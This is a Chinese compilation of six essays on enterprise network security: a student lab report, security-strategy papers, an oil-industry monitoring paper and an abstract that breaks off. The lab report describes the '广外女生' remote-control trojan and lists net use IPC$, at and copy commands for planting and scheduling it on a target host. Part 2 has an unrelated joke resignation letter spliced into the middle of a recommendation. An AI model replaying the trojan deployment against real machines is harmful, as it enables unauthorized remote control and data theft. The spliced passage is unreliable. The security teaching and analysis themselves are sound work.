企业网络信息安全

企业网络信息安全（通用6篇）

篇1：企业网络信息安全

XX中型企业网安全 网络信息安全报告

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架，网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则，应尽量避免过深过繁的理论探讨，重在理解网络安全的基本框架，网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解（了解Windows的使用，具有键盘操作和文件处理的基础），并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

（1）网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此，我们必须采取相应的安全措施杜绝安全隐患，其中应该做到：

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

（2）解决网络安全问题的一些要求

A、大幅度地提高系统的安全性（重点是可用性和可控性）；

B、保持网络原有的特点，即对网络的协议和传输具有良好的透明性，能透明接入，无需更改网络设置；

C、易于操作、维护，并便于自动化管理，而不增加或少增加附加操作；

D、尽量不影响原网络拓扑结构，同时便于系统及系统功能的扩展；

E、安全保密系统具有较好的性能价格比。一次性投资，可以长期使用；

F、安全产品具有合法性，及经过国家有关管理部门的认可或认证；

（3）系统安全目标

A、建立一套完整可行的网络安全与网络管理策略；

B、将内部网络、公开服务器网络和外网进行有效隔离，避免与外部网络直接通信；

C、建立网站各主机和服务器的安全保护措施，保证他们的系统安全；

D、加强合法用户的访问认证，同时将用户的访问权限控制在最低限度；

E、全面监视对公开服务器的访问，及时发现和拒绝不安全的操作和黑客攻击行为；

F、加强对各种访问的审计工作，详细记录对网络、公开服务器的访问行为，形成完整的系统日志；

2、网络拓扑

3、网络安全的基本内容

（1）基本网络命令

A、ping命令： ping –t IP，向指定的计算机不停的发送数据包，按Ctr+Break快捷键可以查看统计信息并继续运行，按 Ctr+C可中止运行。

B、Tracert命令：tracert IP 显示从本地计算机到目标服务器所经过的计算机：

C、pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的%

（2）操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口：

然后在该对话框中选中需要屏蔽的程序，并单击右键，然后选择“停止”命令，同时将“启动类型”设置为“手动”或“已禁用”，这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享：“开始”——“程序”——“管理工具”——“服务”——“Server”

（3）数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称，也不能删除这个超级用户，所以，我们必须对这个帐号进行最强的保护，当然，包括使用一个非常强壮的密码，最好不要在数据库应用中使用sa帐号，只有当没有其它方法登录到 SQL Server 实例(例如，当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候，应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越，原因在以下：

1)它通过限制对Microsoft Windows用户和域用户帐户的连接，保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益，例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证，不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式，步骤操作： 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。（4）网络防火墙工具：红墙主机网络防火墙 安装

1.具体操作如下：

第一步： 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器，运行根目录下的Setup文件来运行其安装程序，进入“爱思红墙主机网络防火墙安装”窗口；

第二步：

在“欢迎安装爱思红墙主机网络防火墙”对话框中，单击“下一步”按钮；

第三步： 在“软件许可协议”对话框，接受协议点击“是”；

第四步： 点击“是”按钮，出现显示您计算机的相关信息，即判断是否可以安装本软件；

第五步： 单击“下一步”按钮，出现“选择目标位置”对话框；

第六步： 在该对话框中，单击“浏览”按钮，并在“选择文件夹”对话框中选择盘符作为驱动器，再指定相应的文件夹及路径，然后单击“确定”按钮；

第七步： 单击“下一步”按钮，出现“选择安装程序名称”对话框，您可自定义程序名称；

第八步： 单击“下一步”按钮，系统开始复制文件；

第九步： 进入“红墙主机网络防火墙配置”窗口，作出是否运行“红墙应用程序扫描系统”的选择后，点击“完成”。

相关设置：告警设置：系统提供了两种情况下的告警，即需要系统告警和不需要系统告警，您可据需要选取告警设置。

点击主界面中的“规则管理”按钮，弹出相应窗口，如下图：

网络监控中心：

（5）网络攻击工具：“广外女生”

它的基本功能有：文件管理方面有上传，下载，删除，改名，设置属性，建立文件夹和运行指定文件等功能；注册表操作方面：全面模拟WINDOWS的注册表编辑器，让远程注册表编辑工作有如在本机上操作一样方便；屏幕控制方面：可以自定义图片的质量来减少传输的时间，在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘，就像操纵自己的计算机一样；远程任务管理方面，可以直观地浏览对方窗体，随意杀掉对方窗体或其中的控件；其他功能还有邮件IP通知等。

主要步骤：首先运行“gwg.exe”，出现如图窗口：

选中“服务端设置”，生成“GDUFS.exe”木马：

然后将“GDUFS.exe”复制到自己的C盘中，再根据一些命令把“GDUFS.exe”复制到目标主机的盘中，再进行运行。目标主机的IP：191.168.12.38 具体步骤及命令：

“开始”——“运行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令：net time 191.168.12.38 获取目标主机的时间

命令：at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结：

通过这次网络安全专周，我不仅仅是学到了很多知识，更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全，即局域网，互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中，内网安全则是重中之重。毕竟是家贼难防。据不完全统计，全国因为内网安全的问题，至少每年算是几亿美元。所以，网络安全特别重要。

至于在将来的工作中，我们也要严格尊市网络设备管理原则和使用秩序，对设备进行统一管理专人负责，严格要求自己对设备进行安全操作，保持强烈的责任感和服务意识，做好每一个细节，重点做好以下几项工作：

1，及时准确判断网络故障，做好上门维护工作或及时提醒网络合作商进行维护。

2，定期检查维护各网络设备的运行情况并进行维护。3，不定期对服务器进行更新和检查。

4，遇到特殊情况，及时向领导和老师汇报，努力提高应急处理问题和独立处理问题的能力。

感谢老师对我们的教导。

篇2：企业网络信息安全

随着计算机技术和网络的快速发展，网络管理也越来越受到人们的重视，企业的发展更离不开网络，但是网络的质量又直接影响着企业的信息安全管理，因此，企业需要制定一种网络和数据安全策略，提高网络管理员的信息掌控能力，为了把企业网络管理做到安全合理，翔羚科技给广大企业做出以下几点建议。

评估企业网络完整性

评估网络的完整性。“了解自己 IT 基础架构的起点和终点，但仍有为数众多的企业不清楚其网络的整体性。还要了解自己的„正常状态‟是什么，这样能够便于你快速确定问题并作出响应。”重新评估您的可接受使用策略和商业行为准则。“抛弃那种冗长的安全政策清单的做法，只将焦点放在那些您知道自己必须实施且能够实施的政策上。”

做好企业内部人员数据管理

确定必须保护哪些数据。“如果不知道必须保护企业内部的哪些信息，您就无法构建有效的 DLP 计划。您还必须确定企业内部哪些人有权访问这些信息，以及必须采用什么方式。”了解数据所在位置，目前采用什么方式进行保护(以及是否正进行保护)。“确定哪些第三方有权存储您公司的数据(从云服务提供商到电邮营销企业)，确保您的信息正得到适当的保护。合规要求，以及当前网络犯罪领域„牵一发而动全身‟的发展趋势都表明，企业绝对不能假设自己的数据是安全的，即便是这些我要走了，今天就早！你给我的工资太高了我受不起啊，我每天都迟到自己感到十分的内疚，不过每天都是我来最早的！合同我已经撕了，你的那份我也帮你偷偷的撕了。我不会怪你的老板，要怪就怪那个宝宝，她怎么就在贵州了呢？我决定了去贵州了解我的下半辈子了!还有你把工资打我卡上吧。信息掌握在可信任的人手里。”

合理采用监控

采用出口监控。“这是一项基本要求，但是很多企业都不够重视，出口监控是一种监控重心的转变，而不是仅侧重于阻止„坏人‟进来。您应该监控那些由内向外发送的内容，包括发送者是谁、发往何处，并拦截那些不允许外泄的内容。”准备迎接必然到来的 BYOD。“企业不要再去想何时转变到 BYOD 模式，而是要开始思考如何转变。”

做好企业应变决策

篇3：企业网络信息安全问题初探

关键词：信息安全问题,企业内部网络,保护措施

1、企业网络安全存在的问题

1.1 网络安全的防患意识淡薄

目前, 一些企业在其内部推行网络化办公, 建设数字化油田, 从上到下建立起了数据采集系统, 网上办公系统等, 对网络的依赖越来越大, 但是相比较网络建设的投入网络安全维护的投入远远跟不上。许多人对石油企业网络安全现状没有客观清醒的认识, 存在不少认知盲区, 没有形成主动防范、积极应对的意识, 更谈不上从根本上提高网络监测、防护、响应、恢复和抗击能力。

1.2 防火墙的局限性

防火墙相关技术的发展已经比较成熟, 许多企业也装有防火墙。但这只是对外防护而已, 它对于内部防护则几乎不起什么作用。如果内部有台机器被控制来攻击局域网内的其它机器, 很容易给局域网造成威胁, 如何防止来自内部的攻击这已经成为是局域网建设中的一个非常重要的问题。

1.3 病毒防护

现在, 计算机病毒的传播途径有网络、邮件、U盘、光盘和磁盘等诸多手段, 用户在使用各种数据介质、软件介质时都可能将病毒在不知不觉中带入到企业网络中。这些病毒就会以几何级数的速度进行自我繁殖, 从而在短时间内导致计算机系统瘫痪。互联网的广泛应用也为病毒感染和快速传播提供了安全途径。病毒从网络之间传递, 导致系统崩溃, 网络瘫痪, 对网络服务构成严重威胁, 造成巨大损失。

1.4 黑客的威胁

黑客利用企业网络的安全漏洞, 在未经允许的情况下非法访问企业内部网络, 任意篡改各种数据、非法获取相关信息, 扰乱了网络秩序, 极大的危害了企业的网络安全, 并可能导致企业机密数据的泄漏和丢失。

2、安全策略及建议

针对上述关于企业网络现状的描述, 可以有从以上几个方面着重考虑加强企业的网络安全监管, 积极采用不同技术来提供各种安全问题的解决方案, 因此, 企业的信息安全应从以下几个方面综合入手:

2.1 应用网络版杀毒软件

网络版杀毒软件最大特点是功能强大、操作简便, 实现全网络范围内的病毒监控。一般的做法是, 在服务器上安装该软件, 采用集中式管理、分布式杀毒的方式, 使系统管理员可以清楚地掌握整个网络环境中各个节点的病毒监测状态, 对局域网进行远程集中式安全管理, 还可调用每个节点各自的杀毒软件对各自节点上的所有文件和内存进行全面病毒查杀与监控。杀毒软件的自动升级功能会使下载的最新升级版本自动分发到各节点计算机, 实现全网络统一升级。邮件是病毒传播的另一个主要途径, 各个单机用户进行邮件的接收、发送时必须打开邮件病毒实时监控功能, 实时地对每一封邮件进行检查, 控制邮件病毒的传播。

2.2 安全检测评估工作

从安全角度看, 企业网络信息安全检测与评估是保障网络安全的重要措施。应进行以下检测与评估: (1) 重点检测与评估连接不同网段的设备和连接广域网 (WAN) 的设备, 如Switch、网桥和路由器等; (2) 数据库具有许多安全特性, 如用户权限设置、数据表安全性、备份特性等, 利用好这些特性是同网络安全系统很好配合的关键; (3) E-mail系统比数据库应用还要广泛, 而网络中绝大部分病毒是由E-mail带来的, 因此, 其检测与评估也变得十分重要。

2.3 身份认证技术

身份认证是用来确认身份真实性的方法, 它的主要任务是保证网络资源不被非法使用和访问, 同时提供对用户行为的监控和记录。只有通过身份认证的用户才能获得相应的权限来使用系统和网络资源。

2.4 访问控制

访问控制是提供信息安全保障的主要手段和安全机制, 被广泛地应用于防火墙、文件访问、VPN及物理安全等多个方面。访问控制是信息安全保障机制的核心内容, 它是实现数据保密性和完整性机制的主要手段。访问控制是为了限制访问主体 (或称为发起者, 是一个主动的实体;如用户、进程、服务等) , 对访问客体 (需要保护的资源) 的访问权限, 从而使计算机系统在合法范围内使用;访问控制机制决定用户及代表一定用户利益的程序能做什么, 及做到什么程度。

3、结语

由于网络安全产品、计算机硬软件是发展的, 病毒和黑客技术也在发展, 所以网络安全是动态的, 因此, 网络和信息安全应是技术和管理的综合。企业除了采取一些技术安全措施外, 还应针对内部用户进行网络安全教育, 建立健全各种安全管理制度, 对威胁和破坏企业信息和数据安全的行为作出严肃处理。同时加强系统和网络管理员队伍的培训和建设, 加强网络系统和数据库的维护, 及时弥补漏洞, 监控来自企业外部的各种攻击和入侵行为, 发现异常马上采取措施。定期对企业网和关键数据进行安全评估, 并有针对性的制定安全防护策略、制定管理规章制度。

参考文献

[1]瞿坦.计算机网络原理及应用基础.华中理工大学出版社, 2005.

[2]贾筱景, 肖辉进.基于防火墙的网络安全技术.达县师范高等专科学校学报, 2005.

[3]钟福训.网络安全方案探讨.齐鲁石油化工, 2004.

篇4：构建企业网络信息安全体系

关键词:信息安全;黑客;屏蔽;日志;入侵

中图分类号:TP393.08 文献标识码:A文章编号:1007-9599 (2010) 06-0000-02

Construction of Enterprise Network Information Security System

Chen Dan

(Guangdong Justice Police Vocational College,Guangzhou510520,China)

Abstract:As viruses,hackers,malicious attacks means emerge in endlessly,enterprise's information security also suffer unprecedented threat,if build enterprise network information security system has become an enterprise's survival and development of the primary consideration to the problem.From the"physical security,system security,network security,application security and security management from five aspects"explains detail of the construction enterprise information safety requirements and implementation scheme.

Keywords:Information safety;Hackers;Shielding;Log;Invasion

随着计算机的网络化和全球化,信息已经成为企业竞争的重要资源之一,然而,信息领域的犯罪也随之而来,商业黑客、病毒、恶意攻击等对企业造成了巨大的危害和损失。2010年1月12日,百度首页被黑的事件,充分说明了企业仍然面临严重的信息安全问题。面对病毒肆虐,黑客侵扰,泄密及窃密等造成的巨大损失,企业唯有构建安全稳健的网络信息安全体系,才能确保在利用互联网获取和传递信息的万无一失。

企业构建网络信息安全体系的总体目标是:建立具有信息安全防护能力、隐患发现能力、网络应急反应能力和信息对抗能力的信息安全保障体系,提高整体信息安全管理水平,切实保障网络安全和信息安全。保证信息的可用性、完整性、保密性;保证网络系统服务的连续性;保证攻击、破坏的可追查性;保证安全管理的可实施性。充分利用认证、访问控制、加密、入侵检测等安全技术,按需求提供多层次的安全保密和防范功能,逐步建立应急处理和数据灾难备份系统,并完善安全管理体系。

企业网络信息安全体系建设要做到“物理安全、系统安全、网络安全、应用安全及管理安全”。

一、物理安全

保证计算机信息系统各类设备的物理安全是保障信息化应用系统安全的前提。物理安全是保护计算机网络设备、设施以及其他媒体免遭地震、水灾、火灾等环境事故以及人为操作失误或错误及各种计算机犯罪行为导致的破坏,主要包括:环境安全、设备安全、媒体安全三个方面。

环境安全:对系统所在环境的安全保护,如区域保护和灾难保护。

设备安全:设备安全主要包括设备的防盗、防毁、电源保护等。

媒体安全:包括媒体数据的安全及媒体本身的安全。显然,为保证信息网络系统的物理安全,除在网络规划和场地、环境等要求之外,还要防止系统信息在空间的扩散。计算机系统通过电磁辐射使信息被截获而失密的案例已经很多,在理论和技术支持下的验证工作也证实这种截取距离在几百甚至可达千米的复原显示技术给计算机系统信息的保密工作带来了极大的危害。为了防止系统中的信息在空间上的扩散,通常是在物理上采取一定的防护措施,来减少或干扰扩散出去的空间信号。

避免信息在空间扩散的防范措施主要有三个方面:

对主机房及重要信息存储、收发部门进行屏蔽处理,即建设一个具有高效屏蔽效能的屏蔽室,用它来安装运行主要设备,以防止磁鼓、磁带与高辐射设备等的信号外泄。为提高屏蔽室的效能,在屏蔽室与外界的各项联系、连接中均要采取相应的隔离措施和设计,如信号线、电话线、空调、消防控制线,以及通风、波导,门的关起等。

对本地网、局域网传输线路传导辐射的抑制,由于电缆传输辐射信息的不可避免性,现均采用光缆传输的方式,大多数均在Modem出来的设备用光电转换接口,用光缆接出屏蔽室外进行传输。

对终端设备辐射的防范。终端机尤其是CRT显示器,由于上万伏高压电子流的作用,辐射有极强的信号外泄,但又因终端分散使用不宜集中采用屏蔽室的办法来防止,故现在的要求除在订购设备上尽量选取较低辐射的产品外,目前主要采取主动式的干扰设备如干扰机来破坏对应信息的窃取,个别重要的首脑或集中的终端也可考虑采用有窗子的装饰性屏蔽室,这种方法虽然降低了部份屏蔽效能,但可大大改善工作环境,使人感到是在普通机房内工作。

二、系统安全

系统安全建设内容包括:访问控制措施、安全审计、补丁策略、负载均衡、扩展的基线加固、日志保护、病毒防护、页面防篡改、URL内容过滤、数据库保护、加密备份。

访问控制:进一步控制服务或应用信息的访问,加强对用户“权利”的指派控制,在每台服务器上启用C2级系统自身的审核机制,完成对用户特权、登录事件、特殊对象访问等类别的审核记录。

主机审计:在一些特殊关键的系统上配置主机审计系统,便于更深入的检测、发现、排除任何入侵行为及系统、服务的安全漏洞。同时管理员可利用其优异的统计报表和报文回放功能,建立阶段性的“风险--威胁分析报表”,便于下一阶段安全策略更新条目的完善。

页面防篡改:需要在安全管理服务器上部署网页防篡改监测系统,在具体的站点服务器上部署网页防篡改的监控代理端,实时监测对外服务网站的运行,如果发现对页面的修改,将实时修复和报警,实现对网站页面的保护。

URL内容过滤:防止访问互联网中含有反动、色情等不良信息的网站,堵截和阻止不良信息的传播,创造一个良好健康的网络环境。

负载均衡:在开销允许的情况下,为部分或所有业务服务器或业务应用配置集群或负载均衡措施,可选择采用内容服务交换机作为维持服务器应用负载均衡的控制设备。

加密备份:作为补充建议,在开销和需求允许的情况下,可考虑对重要资产的数据备份进行适当的加密处理,避免因备份介质丢失而造成的数据内容泄露。

三、网络安全

网络安全是整个安全解决方案的关键,包括:访问控制、通信保密、入侵检测、网络安全扫描系统、防病毒等。

隔离与访问控制:企业内部办公自动化网络根据不同用户安全级别或者根据不同部门的安全需求,利用三层交换机来划分虚拟子网,在没有配置路由的情况下,不同虚拟子网间是不能够互相访问。通过虚拟子网的划分,能够实现较粗略的访问控制。

防火墙:防火墙是实现网络安全最基本、最经济、最有效的安全措施之一。防火墙通过制定严格的安全策略实现内外网络或内部网络不同信任域之间的隔离与访问控制。并且防火墙可以实现单向或双向控制,对一些高层协议实现较细粒度的访问控制。

通信保密:数据的机密性与完整性,主要是为了保护在网上传送的私密信息,经过配备加密设备,使得在网上传送的数据是密文形式,而不是明文。可以根据情况选择链路层加密、网络层加密等不同方式。

入侵检测:入侵检测系统是根据已有的、最新的攻击手段的信息代码对进出局域网段的所有操作行为进行实时监控、记录,并按制定的策略实行响应(阻断、报警、发送E-mail)。从而防止针对网络的攻击与犯罪行为。入侵检测系统一般包括控制台和探测器(网络引擎)。控制台用作制定及管理所有探测器(网络引擎)。探测器(网络引擎)用作监听进出网络的访问行为,根据控制台的指令执行相应行为。由于探测器采取的是监听不是过滤数据包,因此,入侵检测系统的应用不会对网络系统性能造成太大影响。

漏洞扫描:漏洞扫描系统可以对网络中所有部件(Web站点,防火墙,路由器,TCP/IP及相关协议服务)进行攻击性扫描、分析和评估,发现并报告系统存在的弱点和漏洞,评估安全风险,建议补救措施。漏洞扫描系统可以对网络系统中的所有操作系统进行安全性扫描,检测操作系统存在的安全漏洞,并产生报表,以供分析;还会针对具体安全漏洞提出补救措施。

病毒防护:用户使用的操作系统一般均为Windows系统,比较容易感染病毒。在网络环境下,计算机病毒有不可估量的威胁性和破坏力。因此计算机病毒的防范也是网络安全建设中应该考虑的重要的环节之一。反病毒技术包括预防病毒、检测病毒和杀毒三种技术。

预防病毒技术通过自身常驻系统内存,优先获得系统的控制权,监视和判断系统中是否有病毒存在,进而阻止计算机病毒进入计算机系统和对系统进行破坏。这类技术有,加密可执行程序、引导区保护、系统监控与读写控制(如防病毒卡等)。

检测病毒技术是通过对计算机病毒的特征来进行判断的技术(如自身校验、关键字、文件长度的变化等),来确定病毒的类型。

杀毒技术通过对计算机病毒代码的分析,开发出具有删除病毒程序并恢复原文件的软件。反病毒技术的具体实现方法包括对网络中服务器及工作站中的文件及电子邮件等进行频繁地扫描和监测。一旦发现与病毒代码库中相匹配的病毒代码,反病毒程序会采取相应处理措施(清除、更名或删除),防止病毒进入网络进行传播扩散。

四、应用安全

通过利用数字签名、加密防护、授权管理,实现高强度身份认证,实现授权管理和责任认定。

建设统一认证授权、资源共享平台,实现统一身份认证和单点登录、资源共享,可以体现信息化多套管理系统的融合性。通过这种有机结合,更好地体现统一平台,大集中的理念。同时,这样做也利于各管理系统的相互促进与相互宣传,资源共享。严格控制内部员工对网络共享资源的使用。在内部子网中一般不要轻易开放共享目录,否则较容易因为疏忽而在与员工间交换信息时泄漏重要信息。对有经常交换信息需求的用户,在共享时也必须加上必要的口令认证机制,即只有通过口令的认证才允许访问数据。虽然说用户名加口令的机制不是很安全,但对一般用户而言,还是起到一定的安全防护,即使有刻意破解者,只要口令设得复杂些,也得花费相当长的时间。

对有涉及私密信息的用户主机,使用者在应用过程中应该做到尽量少开放一些不常用的网络服务。对数据库服务器中的数据库必须做安全备份。通过网络备份系统,可以对数据库进行远程备份存储。

针对信息的安全性、完整性、正确性和不可否认性等问题,目前国际上先进的方法是采用信息加密技术、数字签名技术。具体实现的办法是使用数字证书,通过数字证书,把证书持有者的公开密钥与用户的身份信息紧密安全地结合起来,以实现身份确认和不可否认性。

五、安全管理

制定健全的安全管理体制将是网络安全得以实现的重要保证。可以根据企业自身的实际情况,制定如安全操作流程、安全事故的奖罚制度以及对任命安全管理人员的考查等。

安全组织体系建设:建立网络安全建设领导小组,由主管领导、网络管理员、安全操作员等人员组成。

安全管理制度建设:面对网络安全的脆弱性,在网络设计上增加安全服务功能,完善系统的安全保密措施同时,按照多人负责、任期有限、职责分离等实施原则,建立健全安全管理制度。

安全管理手段:采用可行的技术对全网的设备、策略、安全事件统一整合、管理,以确保管理制度的顺利实施。

做到以上五点安全措施,企业就能构建起一个安全的网络环境。然而,互联网瞬息万变,黑客的攻击手段也会不断更新,因此,构建安全的企业信息环境也是一个长期而复杂的过程,我们的企业只有不断的探索并应用新的信息安全技术,才能做到永久的信息安全。

参考文献:

[1]胡道元,闵京华.网络安全.清华大学出版社,2008

[2]拉菲(美).思科网络技术学院教程,网络安全.人们邮电出版社,2008

[3]杨哲.无线网络安全攻防实战.电子工业出版社,2008

[4]海吉(美).网络安全技术与解决方案(修订版)人民邮电出版社,2010

[5]冯登国,赵险峰.信息安全技术概论.电子工业出版社,2009

篇5：企业网络信息安全

石油企业网络信息安全监控技术论文

摘要：石油企业网络由于运行平台和环境的相对独立，其安全性常被人们所忽视。随着网络信息技术的推广和应用，在石油企业的管理系统、控制系统和基础应用类系统中网络信息安全问题正在逐渐出现，为了保障基于石油企业网络业务的持续性、稳定性，需要采取对应的网络信息安全保护措施，建立有效的安全监控体系，文章主要分析了石油企业网络安全状况，并对网络信息安全监控技术进行了较为深入的研究。

关键词：网络信息安全;监控技术;石油企业

随着石油工业的迅速发展，关键业务的不断增加，基于网络信息技术的应用系统被不断开发并应用于石油企业。通过将业务系统、网络、与信息技术有机结合，在传统的产品生产过程中，信息技术的应用使企业的综合竞争力和劳动生产率大大提高。在石油企业的管理系统、控制系统和基础应用类系统中网络信息安全问题正在逐渐出现，对石油企业网络的安全与稳定产生了巨大影响。这将成为石油企业目前面临的重大安全课题。随着石油企业进入规模化的生产，生产装置所积聚的能量越来越多，这很可能造成重大的工业事故，人们前所未有地开始重视工业生产中的网络安全问题。针对这些突发的、影响极其恶劣的网络信息安全事故，相应的监控技术具有极其重要的地位。

1石油企业网络信息安全现状

石油企业网络信息系统中存在很多的安全隐患，任何安全隐患被他人利用后很可能给个人或企业造成巨大的损失。石油企业网络信息系统由管理网络、工业控制网络以及基础应用网络组成，而互联网与管理网络互相连接，网络的结构较为复杂，所以石油企业的网络面对着各种非法的入侵威胁，这些入侵可能来自外部或内部。为了防止外部和内部的不安全活动，网络系统中已安装防病毒系统以及防火墙等安全防护产品，但因为网络安全事件的复杂性、网络信息安全问题出现的偶然性、最新漏洞被利用的快速性和产品规则库升级的滞后性，管理人员不能立即找到网络系统的漏洞，所以无法实现网络的安全预防工作，这将会对石油企业造成许多额外的`损失。石油企业缺少对内外网络的监控，其中对内部数据通信的监控尤其缺少，因此对内外部网络的入侵行为无有效的监控措施，当安全事件发生的时候，无法立即进行阻断和防护。在石油企业中，主机和主要网络设备中的日志数据含有大量的重要信息，尤其是被防火墙拦下的攻击信息、主机和设备的日志信息及入侵检测的报警信息，但目前并没有任何有用的审计机制来分析和监控针对这些设备的非法访问和操作。通过制定安全策略，从而建立网络层信息的访问控制机制，其中网络体系的框架为内外部服务网构成的纵深防御框架，体系的基础是内外部防火墙。综合对石油企业网络和互联网的安全问题分析得出，目前在石油企业构建一套建立在入侵检测、病毒防护和网络管理基础上较为完善的网络安全 监控分析系统已是刻不容缓的事情。

2石油企业网络信息安全监控技术

网络数据流通过软件或者硬件被实时检查，再将其和入侵特征数据库中的数据比较分析。若发现异常现象，立刻实行用户所定义的反应，这就是网络信息安全监控的具体表现。网络监控系统分为两类，一类是硬件设备，另一类是软件，主要指网络舆情监控。

2.1网络信息安全监控系统组成

网络信息安全监控体系必须具有及时性、准确性、联动性以及能够严密控制、妥善处理安全事件的作用，因此网络信息安全监控系统可以划分为五大部分，分别是：被监控网络、探测器、节点管理器、数据(控制)中心、查询/管理终端(如图1)。

2.1.1被监控网络被监控的对象就是被监控网络。网络中的硬件设备或者应用程序等都可以是被监控对象。

2.1.2探测器在整个网络信息安全监控系统中，数据源的准确性以及实时性非常重要，而探测器是系统中数据获取、收集部分，并且拥有将数据分析还原的能力，因此探测器也是网络信息安全监控系统的重要部分。分布式监控系统中有很多个探测器，一个探测器可以探测一个网络区段。探测器的设计是网络信息安全监控技术的关键，探测器通常是软硬件相结合，用来接收网络中传输的信息，来获得网络中传输的信息。网络中传输的内容都是以数据包构成的，数据包中包含着很多数据，在网络设备的操作系统网络接口间互相交换。如果数据包具有隐藏的敌意，探测器将分析组合和分解数据包，从而判断数据包是否具有威胁，并实时记录和报警具有攻击性、无任何作用以及能够泄露信息的数据包。探测器具有包分析和抓包两大功能。包分析是指检测数据包是否合法;抓包是指通过设置网卡的全收模式阻挡数据包。因此，探测器应该首先分类各种非法入侵方式，提取相应的入侵规则，并建立入侵规则库，最后分析数据包中的各种信息，将分析出的信息和入侵规则库进行相应匹配，假设发现可疑的数据包和非法入侵，立即报警并且记录相应报警及网络活动信息。

2.1.3节点控制器探测器设备的维护主要由节点控制器来负责，节点控制器还具有控制中心通信的功能。探测器的设计是信息安全监控技术的关键，故其在网络中的位置对整个监控系统影响重大，这个位置必须满足能接收被监控网络所有信息的要求。节点控制器不仅负责管理探测器，而且还负责连接探测器和数据中心。节点控制器主要收集本区数据的分析结果,并且对数据的分析结果作相应的格式转换处理,最后发送到数据控制中心或者保存在本区域中，同时将本区内探测器的网络情况和运行情况发送给数据控制中心。

2.1.4数据控制中心网络信息安全监控系统的控制管理和数据存储中心是数据控制中心，是整个网络监控系统和数据审计的重要部分。

2.1.5查询/管理终端查询/管理终端是用户使用的界面，也就是用户的操作平台。查询/管理终端具有重新播放会话、查询数据库以及管理维护数据控制中心的功能，比如删除、备份等。网络信息安全监控系统运行时，各个设备互相连接。具体表现如下，探测点从数据控制中心的入侵规则库获得入侵规则,同时将数据的分析还原结果储存到数据控制中心里;查询/管理终端收集用户各种查询或者管理的请求，从而提供信息或修改系统。从逻辑上来看，网络信息安全监控系统是分布式结构，整个系统的传输和计算任务由系统的每个部分共同分担，这样的结构不仅能提升系统的效率,还能提升整个系统的扩展性。

2.2网络舆情监控网络信息安全

监控系统使用舆情分析引擎、舆情办公平台开发以及数据采集引擎，因此能够舆情检索监控网络环境信息安全。根据自己所需要检索的目标，输入相应的关键词，在谷歌等主要的搜索引擎、重要的论坛、热门的博客以及著名的贴吧中，网络舆情监控系统将自动重组、整合含该检索词的内容，再以固定的格式反馈给用户，并把检索结果中出现的网络链接的地址、网页的标题、网页的摘要、相应检索关键字以及数据来源等信息储存到数据控制中心，最后对数据控制中心的内容进行更准确的第二次检索。另外，网络舆情监控还具有发布与流转Web方式信息、逐级审核并处理不良信息的功能。

3结语

计算机网络的发展使计算机在石油企业中的应用更加深入和广泛，但随之而来的网络安全问题越来越严重。网络安全技术是多种多样的，其中网络信息安全监控技术在网络安全技术中具有重要的地位，而监控技术的开发对石油企业的网络信息安全提供了良好的保护。随着网络信息的不断更新，网络中不存在绝对的安全防范技术，无法阻挡所有的非法入侵威胁，因此我们需要不断地更新石油企业网络信息安全监控技术，保证石油企业网络的持久安全。

参考文献：

[1]志云,刘建友,赵丹丹,等.精细化工生产过程的若干安全系统工程技术问题讨论[J].化工自动化及仪表,2010,37(4):1~2

[2]靳江红,吴宗之,赵寿堂,等.安全仪表系统的功能安全国内外发展综述[J].化工自动化及仪表,2010,37(51):2

[3]刘润平,万佩真.企业网络安全问题与对策[J].企业经济,2010(7)

篇6：企业网络信息安全

对大型企业集团网络与信息安全现状及安全隐患进行分析，提出了总体解决方案以及企业集团的管理对策，加强安全保密技术措施，构建系统的安全保密防范体系。主要内容包括：网络安全准入、移动介质注册管理、电子文件加密保护、内部网页授权管理、国际互联网应用管控、操作El志和邮件归档审计等。企业集团实施网络与信息安全保密技术和管理策略将取得明显的信息安全及保密效果。

1、大型企业集团的网络与信息安全保密工作现状与分析

1.1大型企业集团网络与信息系统安全保密工作现状

